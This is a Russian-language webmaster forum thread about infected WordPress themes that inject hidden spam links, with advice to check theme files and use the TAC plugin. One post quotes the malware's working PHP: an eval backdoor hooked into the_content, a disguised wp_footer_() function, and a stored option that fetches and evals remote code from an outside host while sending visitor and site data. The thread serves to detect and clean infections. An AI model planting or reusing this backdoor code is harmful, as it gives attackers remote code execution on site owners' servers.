Собственно к чему я это решил спросить, я тут не давно столкнулся с такой бедой что в месте с темой на сайт прописывается зловред который потом добавляет скрытые ссылки на страницы сайта, вещь излечимая но все же не приятная.
Я, например, ВСЕ файлы шаблона проверяю перед установкой новой темы. Во-первых, для проверки темы на "злой" код, во-вторых, для исправления ошибок автора темы. А вообще, темы нужно проверять 100%. Очень много в инете зараженных тем.
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
После активации темы он видимо меняет это код на код следующего характера, так как на зараженных сайтах код что выше отсутствовал, за то был такой:
PHP код:
function wp_footer_() {
return @eval(get_option('blogoption'));
}
Так же на зараженных сайтах если выполнить запрос к базе:
PHP код:
SELECT * FROM `wp_options` WHERE `option_name` = 'blogoption'
Результат был такой:
PHP код:
global $post;return eval(file_get_contents('http://mytestlabs.com/wp5.php?ag='.strpos($_SERVER['HTTP_USER_AGENT'],'yahoo').'&p404='.is_404().'&p_id='.$post->ID.'&single='.(is_single()||is_page()).'&perm='.get_permalink().'&site='.$_SERVER['HTTP_HOST'].'&page='.$_SERVER['REQUEST_URI'].'&ip='.getenv('REMOTE_ADDR')));
Выводился эта беда в footer.php функцией wp_footer_(); как видно очень похожей на родную.
Весь этот зловред плодил на сайте скрытые ссылки, при просмотре их не было видно они скрывались с помощью css.
После удаления этого кода ссылки пропали.
---------- Сообщение добавлено 12:03 ---------- Предыдущее 12:01 ----------
vorons, а он проверяет до активации темы или уже непосредственно активированную тему на сайте?
---------- Сообщение добавлено 12:07 ---------- Предыдущее 12:03 ----------
Плагин TAC ищет в коде шаблона зашифрованные внешние ссылки, которые оставляют создатели шаблонов для продвижения своих сайтов.
Установка плагина TAC. В админке блога находим раздел Плагины — нажимаем Добавить новый — и в открывшемся окне вводим в строку поиска его название: TAC.
Устанавливаем плагин TAC и активируем его. Для открытия страницы плагины найдите в разделе Внешний вид — нажмите TAC. Откроется страница на которой будут представлены результаты поиска закодированных ссылок в шаблоне по всем установленным темам на сайте